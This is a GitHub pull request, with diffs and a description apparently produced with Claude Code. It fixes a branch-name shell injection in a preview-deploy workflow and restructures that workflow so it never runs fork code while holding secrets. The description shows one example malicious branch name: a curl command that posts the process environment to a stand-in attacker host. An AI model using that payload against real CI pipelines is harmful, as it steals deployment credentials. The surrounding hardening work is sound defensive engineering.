### PR TITLE
Deploy previews without executing PR code (fix branch-name injection)

### DIFF
--- a/.github/workflows/ci.yml
+++ b/.github/workflows/ci.yml
@@ -40,7 +40,6 @@ jobs:
     - uses: wyvox/action@v2
       with:
         repo-token: ${{ secrets.GITHUB_TOKEN }}
-    - run:  echo ${{ github.event.number }} > ./pr-number.txt
     - run: pnpm turbo build --force
 
   build_tests:
@@ -65,7 +64,6 @@ jobs:
     - uses: wyvox/action@v2
       with:
         repo-token: ${{ secrets.GITHUB_TOKEN }}
-    - run:  echo ${{ github.event.number }} > ./pr-number.txt
     - run: pnpm turbo build:prod
     - run: ls -la ./apps/repl/dist
     - run: ls -la ./apps/tutorial/dist
@@ -174,9 +172,6 @@ jobs:
     permissions:
       contents: read
       deployments: write
-    outputs:
-      limberUrl: ${{ steps.limber.outputs.url }}
-      tutorialUrl: ${{ steps.tutorial.outputs.url }}
     steps:
       - uses: actions/download-artifact@v8
         name: deploy-prep-dist

--- a/.github/workflows/deploy-preview.yml
+++ b/.github/workflows/deploy-preview.yml
@@ -1,40 +1,21 @@
-# Because C.I. jobs could expose secrets to malicious pull requsets,
-# GitHub prevents (by default) exposing action secrets to pull requests
-# from forks.
+# Fork PRs can't be trusted with secrets, so preview deploys are split
+# across two workflows:
 #
-# This is great, however, the jobs that use the secrets are still useful on 
-# pull requests.
+#   1. CI (pull_request) -- runs the fork's code with NO access to secrets,
+#      builds the apps, and uploads the `deploy-prep-dist` artifact.
+#   2. This workflow (workflow_run) -- has the secrets, but never checks out
+#      or executes anything from the PR. It only downloads that artifact
+#      (static, browser-only files), deploys it to Cloudflare, and comments.
 #
-# To run a _trusted_ workflow, we can trigger it from an event from an _untrusted_
-# workflow. This keeps the secrets out of reach from the fork, but still allows
-# us to keep the utility of pull request preview deploys, browserstack running, etc.
-# Normally, this _trusted_ behavior is offloaded by Cloudflare, Netlify, Vercel, etc
-# -- their own workers are trusted and can push comments / updates to pull requests.
+# The PR number / branch / sha are resolved from the GitHub API rather than
+# from the artifact, because a malicious PR controls the artifact's contents.
+# The branch name is still attacker-chosen, so it only ever flows through
+# env vars (quoted), never inlined into scripts.
 #
-# We don't want to use their slower (and sometimes paid) hardware.
-# When we use our own workflows, we can re-use the cache built from the PR 
-# (or elsewhere).
-#
-# To be *most* secure, you'd need to build all the artifacts in the PR,
-# then upload them to then be downloaded in the trusted workflows.
-# Trusted workflows should not run any scripts from a PR, as malicious
-# submitters may tweak the build scripts.
-# Since all build artifacts are for the web browser, and not executed in 
-# node-space, we can be reasonably confident that downloading and testing/deploying 
-# those artifacts does not compromise our secrets.
-#
-#
-# More information here: 
+# More information:
 #   https://securitylab.github.com/research/github-actions-preventing-pwn-requests/
-#
-# Things that would make this easier:
-#   Readablity: https://github.com/actions/download-artifact/issues/172
-#   Security: 
-#    - if there was a way to avoid pnpm install *entirely*
 name: Deploy Preview
 
-# read-write repo token
-# access to secrets
 on:
   workflow_dispatch:
     inputs:
@@ -45,8 +26,7 @@ on:
   workflow_run:
     workflows: ["CI"]
     types:
-      # as early as possible
-      - requested
+      - completed
 
 concurrency:
   # pull_requests[] is empty for fork PRs; fall back to the head SHA
@@ -56,67 +36,20 @@ concurrency:
 # This workflow has secrets but handles fork-controlled data; jobs request what they need.
 permissions: {}
 
-env:
-  TURBO_API: http://127.0.0.1:9080
-  TURBO_TOKEN: this-is-not-a-secret
-  TURBO_TEAM: myself
-
-
-jobs: 
-  # This is the only job that needs access to the source code
-  Build:
-    runs-on: ubuntu-latest
-    timeout-minutes: 15
-    needs: [determinePR]
-    permissions:
-      contents: read
-      # turborepo-gh-artifacts reads/writes this run's artifacts for the turbo cache
-      actions: write
-    steps:
-      - uses: actions/checkout@v6
-        with:
-          # Defaults to ${{ github.repository }}, but that doesn't work for forks
-          # This should also make it obvious why this is in a separate workflow
-          # and in a job that doesn't have access to our secrets.
-          #
-          # (workflow_run.head_repository / head_branch are EMPTY for fork PRs,
-          #  which made checkout silently fall back to the base repo's main --
-          #  determinePR resolves the real repo + branch via the API instead)
-          repository: ${{ needs.determinePR.outputs.repo }}
-          ref: ${{ needs.determinePR.outputs.branch }}
-          # the fork's build scripts must not find the GITHUB_TOKEN in .git/config
-          persist-credentials: false
-      - name: TurboRepo local server
-        uses: felixmosh/turborepo-gh-artifacts@v4
-        with:
-          repo-token: ${{ secrets.GITHUB_TOKEN }}
-      - uses: wyvox/action-setup-pnpm@v4
-      - run: pnpm turbo build:prod 
-      - uses: actions/upload-artifact@v7
-        with:
-          name: deploy-prep-dist
-          if-no-files-found: error
-          path: | 
-            ./apps/**/dist/**/*
-            !node_modules/
-            !./**/node_modules/
-
-#################################################################            
-# For the rest:
-# Does not checkout code, has access to secrets
-#################################################################            
-
+jobs:
   determinePR:
-    # this job gates the others -- if the workflow_run request did not come from a PR,
-    # exit as early as possible
+    # this job gates the others -- only deploy previews for successful PR builds
     runs-on: ubuntu-latest
-    if: github.event.workflow_run.event == 'pull_request' || github.event.inputs.prNumber
+    if: (github.event.workflow_run.event == 'pull_request' && github.event.workflow_run.conclusion == 'success') || github.event.inputs.prNumber
     permissions:
       pull-requests: read
+      # to find the CI run that has the artifact (workflow_dispatch path)
+      actions: read
     outputs:
       number: ${{ steps.pr-info.outputs.number }}
       branch: ${{ steps.pr-info.outputs.branch }}
-      repo: ${{ steps.pr-info.outputs.repo }}
+      sha: ${{ steps.pr-info.outputs.sha }}
+      run-id: ${{ steps.pr-info.outputs.run-id }}
       subdomain: ${{ steps.pr-info.outputs.subdomain }}
     steps:
       - id: pr-info
@@ -126,6 +59,7 @@ jobs:
           INPUT_PR_NUM: ${{ github.event.inputs.prNumber }}
           EVENT_PR_NUM: ${{ github.event.workflow_run.pull_requests[0].number }}
           HEAD_SHA: ${{ github.event.workflow_run.head_sha }}
+          RUN_ID: ${{ github.event.workflow_run.id }}
           REPOSITORY: ${{ github.repository }}
         run: |
           if [ -n "$INPUT_PR_NUM" ]; then
@@ -146,9 +80,20 @@ jobs:
             exit 1
           fi
 
-          PR_JSON=$(gh pr view "$PR_NUM" --repo "$REPOSITORY" --json headRefName,headRepository,headRepositoryOwner)
+          PR_JSON=$(gh pr view "$PR_NUM" --repo "$REPOSITORY" --json headRefName,headRefOid)
           BRANCH=$(echo "$PR_JSON" | jq -r '.headRefName')
-          REPO=$(echo "$PR_JSON" | jq -r '.headRepositoryOwner.login + "/" + .headRepository.name')
+          SHA="${HEAD_SHA:-$(echo "$PR_JSON" | jq -r '.headRefOid')}"
+
+          # workflow_dispatch has no triggering run, so find the newest
+          # successful CI run for the PR's head commit
+          if [ -z "$RUN_ID" ]; then
+            RUN_ID=$(gh run list --repo "$REPOSITORY" --workflow ci.yml --commit "$SHA" \
+              --status success --json databaseId --jq '.[0].databaseId')
+          fi
+          if [ -z "$RUN_ID" ]; then
+            echo "::error::No successful CI run (which uploads deploy-prep-dist) found for $SHA"
+            exit 1
+          fi
 
           # Cloudflare's branch-alias subdomain: lowercase [a-z0-9-], max 28 chars,
           # e.g. renovate/uuid becomes renovate-uuid.
@@ -159,7 +104,8 @@ jobs:
 
           echo "number=$PR_NUM" >> "$GITHUB_OUTPUT"
           echo "branch=$BRANCH" >> "$GITHUB_OUTPUT"
-          echo "repo=${REPO:-$REPOSITORY}" >> "$GITHUB_OUTPUT"
+          echo "sha=$SHA" >> "$GITHUB_OUTPUT"
+          echo "run-id=$RUN_ID" >> "$GITHUB_OUTPUT"
           echo "subdomain=$SUBDOMAIN" >> "$GITHUB_OUTPUT"
 
   # We can know the URL ahead of time:
@@ -169,20 +115,23 @@ jobs:
     name: "Deploy: Preview ${{ matrix.app.name }}"
     runs-on: ubuntu-latest
     timeout-minutes: 15
-    needs: [Build, determinePR]
+    needs: [determinePR]
     permissions:
-      contents: read
-    strategy: 
+      # to download the CI run's artifact
+      actions: read
+    strategy:
       matrix:
-        app: 
+        app:
         - { path: "./tutorial/dist", cloudflareName: "limber-glimmer-tutorial", name: "tutorial" }
         - { path: "./repl/dist", cloudflareName: "limber-glimdown", name: "limber" }
     steps:
-      - name: Download build artifact
+      - name: Download build artifact from the CI run
         uses: actions/download-artifact@v8
         with:
           name: deploy-prep-dist
           path: ./deploy-prep-dist
+          run-id: ${{ needs.determinePR.outputs.run-id }}
+          github-token: ${{ secrets.GITHUB_TOKEN }}
       - name: Preview ${{ matrix.app.name }}
         working-directory: ./deploy-prep-dist/${{ matrix.app.path }}
         # BRANCH is fork-controlled and this step holds the Cloudflare secrets:
@@ -197,7 +146,7 @@ jobs:
           CLOUDFLARE_API_TOKEN: ${{ secrets.CLOUDFLARE_API_TOKEN }}
           PROJECT_NAME: ${{ matrix.app.cloudflareName }}
           BRANCH: ${{ needs.determinePR.outputs.branch }}
-          HEAD_SHA: ${{ github.event.workflow_run.head_sha }}
+          HEAD_SHA: ${{ needs.determinePR.outputs.sha }}
 
   PostComment:
     name: Post Preview URL as comment to PR
@@ -208,15 +157,14 @@ jobs:
     steps:
       - uses: marocchino/sticky-pull-request-comment@v3
         with:
-          header: preview-urls 
+          header: preview-urls
           number: ${{ needs.determinePR.outputs.number }}
           message: |+
-            | Project   | Preview URL[^note] | Manage | 
+            | Project   | Preview URL[^note] | Manage |
             | -------   | ------------------ | ------ |
-            | Limber    | https://${{ needs.determinePR.outputs.subdomain }}.limber-glimdown.pages.dev   | [on Cloudflare](https://dash.cloudflare.com/c67910a047e1510fec6d0d0cf442934c/pages/view/limber-glimdown) | 
+            | Limber    | https://${{ needs.determinePR.outputs.subdomain }}.limber-glimdown.pages.dev   | [on Cloudflare](https://dash.cloudflare.com/c67910a047e1510fec6d0d0cf442934c/pages/view/limber-glimdown) |
             | Tutorial  | https://${{ needs.determinePR.outputs.subdomain }}.limber-glimmer-tutorial.pages.dev | [on Cloudflare](https://dash.cloudflare.com/c67910a047e1510fec6d0d0cf442934c/pages/view/limber-glimmer-tutorial)
 
-            [Logs](https://github.com/NullVoxPopuli/limber/actions/runs/${{ github.run_id }}) 
+            [Logs](https://github.com/NullVoxPopuli/limber/actions/runs/${{ github.run_id }})
 
             [^note]: if these branch preview links are not working, please check the logs for the commit-based preview link. There is a character limit of 28 for the branch subdomain, as well as some other heuristics, [described here](https://community.cloudflare.com/t/algorithm-to-generate-a-preview-dns-subdomain-from-a-branch-name/477633?u=walshymvp) for the sake of implementation ease in deploy-preview.yml, that algo has been omitted.  The URLs are logged in the wrangler output, but it's hard to get outputs from a matrix job.
-

--- a/.github/workflows/deploy-preview.yml
+++ b/.github/workflows/deploy-preview.yml
@@ -84,11 +84,17 @@ jobs:
           BRANCH=$(echo "$PR_JSON" | jq -r '.headRefName')
           SHA="${HEAD_SHA:-$(echo "$PR_JSON" | jq -r '.headRefOid')}"
 
-          # workflow_dispatch has no triggering run, so find the newest
-          # successful CI run for the PR's head commit
+          # On the workflow_run trigger, RUN_ID *is* the CI run that triggered
+          # us -- unambiguously this PR's run, even with other PRs building at
+          # the same time. workflow_dispatch has no triggering run, so match the
+          # CI run by this PR's exact head commit. A head SHA belongs to exactly
+          # one PR, and --event pull_request avoids matching a post-merge push
+          # run on the same commit; among re-runs of that identical commit we
+          # take the most recent.
           if [ -z "$RUN_ID" ]; then
-            RUN_ID=$(gh run list --repo "$REPOSITORY" --workflow ci.yml --commit "$SHA" \
-              --status success --json databaseId --jq '.[0].databaseId')
+            RUN_ID=$(gh run list --repo "$REPOSITORY" --workflow ci.yml \
+              --commit "$SHA" --event pull_request --status success \
+              --json databaseId,createdAt --jq 'sort_by(.createdAt) | last | .databaseId')
           fi
           if [ -z "$RUN_ID" ]; then
             echo "::error::No successful CI run (which uploads deploy-prep-dist) found for $SHA"

--- a/.github/workflows/deploy-preview.yml
+++ b/.github/workflows/deploy-preview.yml
@@ -53,9 +53,7 @@ concurrency:
   group: deploy-preview-${{ github.event.workflow_run.pull_requests[0].number || github.event.workflow_run.head_sha || github.event.inputs.prNumber || github.ref }}
   cancel-in-progress: true
 
-# No default permissions -- each job requests exactly what it needs.
-# This workflow runs with access to secrets while handling data controlled
-# by fork PRs (branch names, PR titles, build scripts), so least-privilege matters.
+# This workflow has secrets but handles fork-controlled data; jobs request what they need.
 permissions: {}
 
 env:
@@ -86,8 +84,7 @@ jobs:
           #  determinePR resolves the real repo + branch via the API instead)
           repository: ${{ needs.determinePR.outputs.repo }}
           ref: ${{ needs.determinePR.outputs.branch }}
-          # This job runs the fork's build scripts (untrusted code).
-          # Don't leave the GITHUB_TOKEN in .git/config where they can read it.
+          # the fork's build scripts must not find the GITHUB_TOKEN in .git/config
           persist-credentials: false
       - name: TurboRepo local server
         uses: felixmosh/turborepo-gh-artifacts@v4
@@ -120,10 +117,10 @@ jobs:
       number: ${{ steps.pr-info.outputs.number }}
       branch: ${{ steps.pr-info.outputs.branch }}
       repo: ${{ steps.pr-info.outputs.repo }}
+      subdomain: ${{ steps.pr-info.outputs.subdomain }}
     steps:
       - id: pr-info
-        # Everything event-controlled goes through env vars, never inlined
-        # into the script -- inlining would let a crafted value execute as shell.
+        # event-controlled values go through env, never inlined -- inlining executes as shell
         env:
           GH_TOKEN: ${{ secrets.GITHUB_TOKEN }}
           INPUT_PR_NUM: ${{ github.event.inputs.prNumber }}
@@ -153,9 +150,17 @@ jobs:
           BRANCH=$(echo "$PR_JSON" | jq -r '.headRefName')
           REPO=$(echo "$PR_JSON" | jq -r '.headRepositoryOwner.login + "/" + .headRepository.name')
 
+          # Cloudflare's branch-alias subdomain: lowercase [a-z0-9-], max 28 chars,
+          # e.g. renovate/uuid becomes renovate-uuid.
+          # (also keeps hostile branch names inert in the PR comment)
+          SUBDOMAIN=$(echo "$BRANCH" | tr '[:upper:]' '[:lower:]' | sed -E 's/[^a-z0-9]+/-/g' | cut -c -28)
+          SUBDOMAIN="${SUBDOMAIN%-}"
+          SUBDOMAIN="${SUBDOMAIN#-}"
+
           echo "number=$PR_NUM" >> "$GITHUB_OUTPUT"
           echo "branch=$BRANCH" >> "$GITHUB_OUTPUT"
           echo "repo=${REPO:-$REPOSITORY}" >> "$GITHUB_OUTPUT"
+          echo "subdomain=$SUBDOMAIN" >> "$GITHUB_OUTPUT"
 
   # We can know the URL ahead of time:
   # https://<SHA>.limber-glimmer-tutorial.pages.dev
@@ -180,9 +185,8 @@ jobs:
           path: ./deploy-prep-dist
       - name: Preview ${{ matrix.app.name }}
         working-directory: ./deploy-prep-dist/${{ matrix.app.path }}
-        # BRANCH is a fork-controlled value; it must only ever be expanded
-        # (quoted) by the shell, never inlined into the script -- this step
-        # has the Cloudflare secrets in its environment.
+        # BRANCH is fork-controlled and this step holds the Cloudflare secrets:
+        # only ever expand it quoted from env, never inline it into the script
         run: |
           npx wrangler pages deploy ./ \
             --project-name="$PROJECT_NAME" \
@@ -195,34 +199,10 @@ jobs:
           BRANCH: ${{ needs.determinePR.outputs.branch }}
           HEAD_SHA: ${{ github.event.workflow_run.head_sha }}
 
-  ReformatSubDomain:
-    name: Reformat Sub-domain Alias
-    runs-on: ubuntu-latest
-    needs: [determinePR]
-    permissions: {}
-    outputs:
-      subdomain: ${{ steps.reformat.outputs.subdomain }}
-    steps:
-      - id: reformat
-        # BRANCH is fork-controlled: expand it via env, never inline it into
-        # the script. Reducing to [a-z0-9-] both matches what Cloudflare
-        # accepts in a subdomain and keeps the value inert when it is later
-        # embedded in the PR comment.
-        env:
-          BRANCH: ${{ needs.determinePR.outputs.branch }}
-        run: |
-          #   renovate/uuid becomes renovate-uuid
-          subdomain=$(echo "$BRANCH" | tr '[:upper:]' '[:lower:]' | sed -E 's/[^a-z0-9]+/-/g')
-          subdomain=$(echo "$subdomain" | cut -c -28)
-          # Strip leading/trailing hyphens (can occur when truncation lands on a hyphen)
-          subdomain="${subdomain%-}"
-          subdomain="${subdomain#-}"
-          echo "subdomain=$subdomain" >> "$GITHUB_OUTPUT"
-
   PostComment:
     name: Post Preview URL as comment to PR
     runs-on: ubuntu-latest
-    needs: [DeployPreview, ReformatSubDomain, determinePR]
+    needs: [DeployPreview, determinePR]
     permissions:
       pull-requests: write
     steps:
@@ -233,8 +213,8 @@ jobs:
           message: |+
             | Project   | Preview URL[^note] | Manage | 
             | -------   | ------------------ | ------ |
-            | Limber    | https://${{ needs.ReformatSubDomain.outputs.subdomain }}.limber-glimdown.pages.dev   | [on Cloudflare](https://dash.cloudflare.com/c67910a047e1510fec6d0d0cf442934c/pages/view/limber-glimdown) | 
-            | Tutorial  | https://${{ needs.ReformatSubDomain.outputs.subdomain }}.limber-glimmer-tutorial.pages.dev | [on Cloudflare](https://dash.cloudflare.com/c67910a047e1510fec6d0d0cf442934c/pages/view/limber-glimmer-tutorial)
+            | Limber    | https://${{ needs.determinePR.outputs.subdomain }}.limber-glimdown.pages.dev   | [on Cloudflare](https://dash.cloudflare.com/c67910a047e1510fec6d0d0cf442934c/pages/view/limber-glimdown) | 
+            | Tutorial  | https://${{ needs.determinePR.outputs.subdomain }}.limber-glimmer-tutorial.pages.dev | [on Cloudflare](https://dash.cloudflare.com/c67910a047e1510fec6d0d0cf442934c/pages/view/limber-glimmer-tutorial)
 
             [Logs](https://github.com/NullVoxPopuli/limber/actions/runs/${{ github.run_id }}) 
 

--- a/.github/workflows/deploy-preview.yml
+++ b/.github/workflows/deploy-preview.yml
@@ -53,6 +53,11 @@ concurrency:
   group: deploy-preview-${{ github.event.workflow_run.pull_requests[0].number || github.event.workflow_run.head_sha || github.event.inputs.prNumber || github.ref }}
   cancel-in-progress: true
 
+# No default permissions -- each job requests exactly what it needs.
+# This workflow runs with access to secrets while handling data controlled
+# by fork PRs (branch names, PR titles, build scripts), so least-privilege matters.
+permissions: {}
+
 env:
   TURBO_API: http://127.0.0.1:9080
   TURBO_TOKEN: this-is-not-a-secret
@@ -65,6 +70,10 @@ jobs:
     runs-on: ubuntu-latest
     timeout-minutes: 15
     needs: [determinePR]
+    permissions:
+      contents: read
+      # turborepo-gh-artifacts reads/writes this run's artifacts for the turbo cache
+      actions: write
     steps:
       - uses: actions/checkout@v6
         with:
@@ -77,6 +86,9 @@ jobs:
           #  determinePR resolves the real repo + branch via the API instead)
           repository: ${{ needs.determinePR.outputs.repo }}
           ref: ${{ needs.determinePR.outputs.branch }}
+          # This job runs the fork's build scripts (untrusted code).
+          # Don't leave the GITHUB_TOKEN in .git/config where they can read it.
+          persist-credentials: false
       - name: TurboRepo local server
         uses: felixmosh/turborepo-gh-artifacts@v4
         with:
@@ -102,36 +114,48 @@ jobs:
     # exit as early as possible
     runs-on: ubuntu-latest
     if: github.event.workflow_run.event == 'pull_request' || github.event.inputs.prNumber
+    permissions:
+      pull-requests: read
     outputs:
       number: ${{ steps.pr-info.outputs.number }}
       branch: ${{ steps.pr-info.outputs.branch }}
       repo: ${{ steps.pr-info.outputs.repo }}
     steps:
       - id: pr-info
+        # Everything event-controlled goes through env vars, never inlined
+        # into the script -- inlining would let a crafted value execute as shell.
         env:
           GH_TOKEN: ${{ secrets.GITHUB_TOKEN }}
+          INPUT_PR_NUM: ${{ github.event.inputs.prNumber }}
+          EVENT_PR_NUM: ${{ github.event.workflow_run.pull_requests[0].number }}
+          HEAD_SHA: ${{ github.event.workflow_run.head_sha }}
+          REPOSITORY: ${{ github.repository }}
         run: |
-          if [ -n "${{ github.event.inputs.prNumber }}" ]; then
-            PR_NUM="${{ github.event.inputs.prNumber }}"
+          if [ -n "$INPUT_PR_NUM" ]; then
+            PR_NUM="$INPUT_PR_NUM"
           else
             # When the PR comes from a fork,
             # github.event.workflow_run.pull_requests is empty
             # (as are head_branch / head_repository), so look it up by SHA
-            PR_NUM="${{ github.event.workflow_run.pull_requests[0].number }}"
+            PR_NUM="$EVENT_PR_NUM"
             if [ -z "$PR_NUM" ]; then
-              HEAD_SHA="${{ github.event.workflow_run.head_sha }}"
-              PR_NUM=$(gh pr list --repo "${{ github.repository }}" --json number,headRefOid \
+              PR_NUM=$(gh pr list --repo "$REPOSITORY" --json number,headRefOid \
                 --jq ".[] | select(.headRefOid == \"$HEAD_SHA\") | .number")
             fi
           fi
 
-          PR_JSON=$(gh pr view "$PR_NUM" --repo "${{ github.repository }}" --json headRefName,headRepository,headRepositoryOwner)
+          if ! [[ "$PR_NUM" =~ ^[0-9]+$ ]]; then
+            echo "::error::Could not determine a PR number (got: '$PR_NUM')"
+            exit 1
+          fi
+
+          PR_JSON=$(gh pr view "$PR_NUM" --repo "$REPOSITORY" --json headRefName,headRepository,headRepositoryOwner)
           BRANCH=$(echo "$PR_JSON" | jq -r '.headRefName')
           REPO=$(echo "$PR_JSON" | jq -r '.headRepositoryOwner.login + "/" + .headRepository.name')
 
           echo "number=$PR_NUM" >> "$GITHUB_OUTPUT"
           echo "branch=$BRANCH" >> "$GITHUB_OUTPUT"
-          echo "repo=${REPO:-${{ github.repository }}}" >> "$GITHUB_OUTPUT"
+          echo "repo=${REPO:-$REPOSITORY}" >> "$GITHUB_OUTPUT"
 
   # We can know the URL ahead of time:
   # https://<SHA>.limber-glimmer-tutorial.pages.dev
@@ -156,32 +180,44 @@ jobs:
           path: ./deploy-prep-dist
       - name: Preview ${{ matrix.app.name }}
         working-directory: ./deploy-prep-dist/${{ matrix.app.path }}
+        # BRANCH is a fork-controlled value; it must only ever be expanded
+        # (quoted) by the shell, never inlined into the script -- this step
+        # has the Cloudflare secrets in its environment.
         run: |
           npx wrangler pages deploy ./ \
-            --project-name=${{ matrix.app.cloudflareName }} \
-            --branch=${{ needs.determinePR.outputs.branch }} \
-            --commit-hash=${{ github.event.workflow_run.head_sha }}
+            --project-name="$PROJECT_NAME" \
+            --branch="$BRANCH" \
+            --commit-hash="$HEAD_SHA"
         env:
           CLOUDFLARE_ACCOUNT_ID: ${{ secrets.CLOUDFLARE_ACCOUNT_ID }}
           CLOUDFLARE_API_TOKEN: ${{ secrets.CLOUDFLARE_API_TOKEN }}
+          PROJECT_NAME: ${{ matrix.app.cloudflareName }}
+          BRANCH: ${{ needs.determinePR.outputs.branch }}
+          HEAD_SHA: ${{ github.event.workflow_run.head_sha }}
 
   ReformatSubDomain:
     name: Reformat Sub-domain Alias
     runs-on: ubuntu-latest
     needs: [determinePR]
-    outputs: 
+    permissions: {}
+    outputs:
       subdomain: ${{ steps.reformat.outputs.subdomain }}
     steps:
       - id: reformat
+        # BRANCH is fork-controlled: expand it via env, never inline it into
+        # the script. Reducing to [a-z0-9-] both matches what Cloudflare
+        # accepts in a subdomain and keeps the value inert when it is later
+        # embedded in the PR comment.
+        env:
+          BRANCH: ${{ needs.determinePR.outputs.branch }}
         run: |
-          branch="${{ needs.determinePR.outputs.branch }}"
-          # Remove any / in the branch name
           #   renovate/uuid becomes renovate-uuid
-          subdomain="${branch//\//-}"
-          subdomain=$(echo $subdomain | cut -c -28)
-          # Strip trailing hyphens (can occur when truncation lands on a hyphen)
+          subdomain=$(echo "$BRANCH" | tr '[:upper:]' '[:lower:]' | sed -E 's/[^a-z0-9]+/-/g')
+          subdomain=$(echo "$subdomain" | cut -c -28)
+          # Strip leading/trailing hyphens (can occur when truncation lands on a hyphen)
           subdomain="${subdomain%-}"
-          echo "subdomain=$subdomain" >> $GITHUB_OUTPUT
+          subdomain="${subdomain#-}"
+          echo "subdomain=$subdomain" >> "$GITHUB_OUTPUT"
 
   PostComment:
     name: Post Preview URL as comment to PR


### PR DESCRIPTION
`deploy-preview.yml` runs on the `workflow_run` trigger — with `CLOUDFLARE_API_TOKEN` and a repo-scoped `GITHUB_TOKEN` — while handling values a fork PR controls. This PR fixes an RCE-class injection and then restructures the workflow to the canonical "download the untrusted build, don't rebuild it" pattern, which removes most of the attack surface (and most of the code).

## The vulnerability

Git ref names may contain `$(...)`, backticks, `;`, `&`, etc. A fork PR whose head branch is named e.g.

```
$(curl -d @/proc/self/environ https://attacker.example)
```

was executed as shell in the `DeployPreview` step's `run:` block — the one with `CLOUDFLARE_API_TOKEN` in its env. That's direct secret exfiltration from any fork PR. The `ReformatSubDomain` job had the same injection (`branch="${{ ... }}"` — double quotes don't stop `$(...)`).

## The structural fix (the bulk of the diff)

The file's own header comment already described the secure design: *"build all the artifacts in the PR, then download them in the trusted workflows … Trusted workflows should not run any scripts from a PR."* CI's `build_prod` job already builds prod and uploads `deploy-prep-dist` — but `deploy-preview` was **re-checking-out and rebuilding the fork's code inside the privileged workflow** anyway.

So this PR makes the privileged workflow stop executing PR code entirely:

- `deploy-preview` now triggers on CI **completion** and downloads `deploy-prep-dist` from that run (`actions/download-artifact` with `run-id` + `github-token`), rather than building it.
- The **`Build` job is deleted** — no checkout, no `pnpm install`, no turborepo server holding a token next to untrusted build scripts. This also resolves the residual risk called out in the earlier revision of this PR (the turbo-token exposure) by removing the job that had it.
- PR number / branch / SHA are still resolved from the **GitHub API**, never read from the artifact, because a malicious PR controls the artifact's contents.
- `workflow_dispatch` (manual re-deploy) locates the newest successful CI run for the PR's head commit.

## The remaining hardening

- Any fork-controlled value (branch name especially) now flows through `env:` and is expanded **quoted** by the shell — never inlined into a `run:` script. `determinePR`'s resolved PR number is checked against `^[0-9]+$`.
- Workflow-level `permissions: {}` with per-job least-privilege grants (`determinePR`: `pull-requests: read` + `actions: read`; `DeployPreview`: `actions: read` to fetch the artifact; `PostComment`: `pull-requests: write`). Previously there was no `permissions:` block, so this secrets-bearing workflow inherited the repo default.
- The preview subdomain is reduced to `[a-z0-9-]`, matching Cloudflare's branch-alias rules and keeping hostile branch names inert in the sticky comment. `ReformatSubDomain` is gone — it's now a fourth output of `determinePR`, one fewer job.

## ci.yml cleanup

- Deletes the `pr-number.txt` steps in `install_dependencies` and `build_prod` — the file was written but never uploaded into an artifact or read by anything.
- Deletes `DeployProduction`'s `outputs:` block, which referenced `steps.limber` / `steps.tutorial` step ids that don't exist (actionlint flagged these once the surrounding lines changed).

## Net effect

~125 lines removed across the two files. The privileged workflow is now: resolve PR → download static browser artifact → `wrangler deploy` → comment. `actionlint` (which shellchecks `run:` blocks) passes clean on both files.

## Residual risk inherent to all fork previews

A preview publishes attacker-controlled *static content* to `*.pages.dev`. That's true of every fork-preview system (Netlify/Vercel/Cloudflare included); the thing worth protecting is the credentials, and after this change no PR-controlled code runs in the workflow that holds them.

🤖 Generated with [Claude Code](https://claude.com/claude-code)
